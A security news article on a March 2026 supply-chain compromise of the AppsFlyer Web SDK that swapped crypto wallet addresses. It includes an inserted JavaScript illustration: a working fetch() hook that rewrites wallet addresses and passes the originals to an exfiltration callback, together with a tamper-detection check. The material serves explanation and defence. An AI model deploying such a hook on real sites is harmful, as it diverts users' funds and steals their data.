Security Breach: AppsFlyer Web SDK Compromised by Crypto-Stealing JavaScript Malware


A recent incident revealed that the AppsFlyer Web SDK was compromised with malicious code aimed at stealing cryptocurrency in a supply-chain attack.

The malicious payload inserted into the SDK could intercept cryptocurrency wallet addresses entered on websites and replace them with attacker-controlled addresses, diverting funds to the threat actor.

AppsFlyer’s SDK is widely utilized by thousands of applications for marketing analytics, impacting a significant number of end users.

According to AppsFlyer, their SDK platform is utilized by 15,000 businesses globally across over 100,000 mobile and web applications, making it one of the prominent “mobile measurement partner” (MMP) SDKs for tracking marketing campaign attribution and in-app events.

Researchers at Profero identified the compromise, confirming that obfuscated, attacker-controlled JavaScript was being delivered to users of websites and applications that embed the AppsFlyer Web SDK.

Initially, AppsFlyer acknowledged only a "domain availability issue" on March 10, 2026, and did not at that stage confirm that the SDK had been compromised.

On March 9, Profero observed a malicious payload being served from the official SDK domain, websdk.appsflyer.com; multiple users independently reported the same payload.

The incident underscores how threat actors can exploit trust in widely deployed third-party SDKs to impact downstream websites, applications, and end users.

The injected JavaScript preserved normal SDK functionality, so that affected sites kept working, while decoding obfuscated strings at runtime and intercepting the browser's network requests.

The malware specifically targeted cryptocurrency wallet input activity, replacing legitimate wallet addresses with the attacker’s address and exfiltrating the original wallet details and associated metadata.


Targeted assets included Bitcoin, Ethereum, Solana, Ripple (XRP), and TRON, which together cover most mainstream cryptocurrency transactions.
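The mechanism described above, as an added illustration rather than the actual AppsFlyer payload or any code from Profero: a script that has been granted page-level trust wraps `fetch()`, rewrites wallet addresses found in outgoing request bodies and sends the originals elsewhere, while the request itself still completes so nothing visibly breaks. The second half shows the check a site can run to notice that its network APIs have been replaced. The address patterns, the attacker addresses and the victim address are all constructed placeholders, and `makeFakeWindow` stands in for the browser so the code runs under Node without a network.

```javascript
// Added illustration (not the actual AppsFlyer payload): wallet-address swapping
// via a fetch() wrapper, plus a tamper check for the page's network APIs.

// Constructed, deliberately loose address patterns for chains named in the article.
// Solana is omitted: bare base58 strings of 32-44 chars match far too much.
const ADDRESS_PATTERNS = [
  { chain: "ethereum", re: /\b0x[0-9a-fA-F]{40}\b/g },
  { chain: "bitcoin", re: /\b(?:bc1[ac-hj-np-z02-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b/g },
  { chain: "tron", re: /\bT[1-9A-HJ-NP-Za-km-z]{33}\b/g },
  { chain: "ripple", re: /\br[1-9A-HJ-NP-Za-km-z]{24,34}\b/g },
];

// Attacker-controlled destinations (constructed placeholders, not real addresses).
const ATTACKER_ADDRESSES = {
  ethereum: "0x" + "a".repeat(40),
  bitcoin: "bc1q" + "q".repeat(38),
  tron: "T" + "A".repeat(33),
  ripple: "r" + "A".repeat(33),
};

// Replace every recognised address in `text` and report what was swapped.
function rewriteAddresses(text, replacements) {
  const swapped = [];
  let out = text;
  for (const { chain, re } of ADDRESS_PATTERNS) {
    out = out.replace(re, (match) => {
      if (match === replacements[chain]) return match; // already the attacker's
      swapped.push({ chain, original: match });
      return replacements[chain];
    });
  }
  return { text: out, swapped };
}

// The hostile wrapper. Requests still reach their destination, so the site and
// the legitimate SDK keep working; only the addresses change, and the originals
// plus request metadata are handed to `exfil`.
function installWalletSwapHook(win, replacements, exfil) {
  const nativeFetch = win.fetch;
  win.fetch = function fetch(input, init = {}) {
    if (typeof init.body === "string") {
      const { text, swapped } = rewriteAddresses(init.body, replacements);
      if (swapped.length > 0) {
        exfil({ url: String(input), swapped });
        init = { ...init, body: text };
      }
    }
    return nativeFetch.call(win, input, init);
  };
}

// Defence: capture the genuine API references in the page's first inline script,
// before any third-party tag runs, and re-check them later (e.g. before a send).
function captureTrustedNetworkApis(win) {
  return { fetch: win.fetch, xhrSend: win.XMLHttpRequest.prototype.send };
}

function isNetworkApiTampered(win, trusted) {
  return win.fetch !== trusted.fetch ||
    win.XMLHttpRequest.prototype.send !== trusted.xhrSend;
}

// Minimal stand-in for `window` so this runs under Node without a browser or network.
function makeFakeWindow() {
  const sent = [];
  function XMLHttpRequest() {}
  XMLHttpRequest.prototype.send = function (body) { sent.push(body); };
  return {
    sent,
    XMLHttpRequest,
    fetch(input, init = {}) { sent.push(init.body); return Promise.resolve({ ok: true }); },
  };
}

const VICTIM_ETH = "0x1234567890abcdef1234567890abcdef12345678"; // constructed

function runSwapDemo() {
  const win = makeFakeWindow();
  const trusted = captureTrustedNetworkApis(win); // taken before the "SDK" loads
  const stolen = [];
  installWalletSwapHook(win, ATTACKER_ADDRESSES, (r) => stolen.push(r));
  win.fetch("https://wallet.example/api/send", {
    method: "POST",
    body: JSON.stringify({ to: VICTIM_ETH, amount: "1.5" }),
  });
  return { sentBody: win.sent[0], stolen, tampered: isNetworkApiTampered(win, trusted) };
}
```

The identity comparison is the useful part: a wrapper can mimic a native function's name and even its `toString()` output, but it cannot be the same object the page captured earlier. The check only helps if the capture runs before any third-party script, which in practice means an inline script at the top of the document.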

The exposure window is estimated to run from March 9 at 22:45 UTC until March 11; whether any impact extends beyond that window is not yet known.

AppsFlyer confirmed unauthorized code being delivered through the SDK, emphasizing that the mobile SDK remained unaffected, and no evidence of customer data access was identified.

The company has resolved the issue and communicated directly with customers regarding the incident.

“The mobile SDK has remained safe to use throughout the process, and the web SDK is safe to use.” – AppsFlyer spokesperson

An ongoing investigation involving external forensic experts is being conducted by AppsFlyer, with further updates to be shared upon completion.

Organizations using the SDK are advised to review telemetry and logs for suspicious API requests associated with the script served from websdk.appsflyer.com, roll back to a known-good version of the SDK, and investigate for signs of compromise.

Earlier this year, AppsFlyer was implicated in a separate incident in which the ShinyHunters threat group leveraged the SDK in a supply-chain breach at Match Group, compromising over 10 million records of Hinge, Match.com, and OkCupid users.
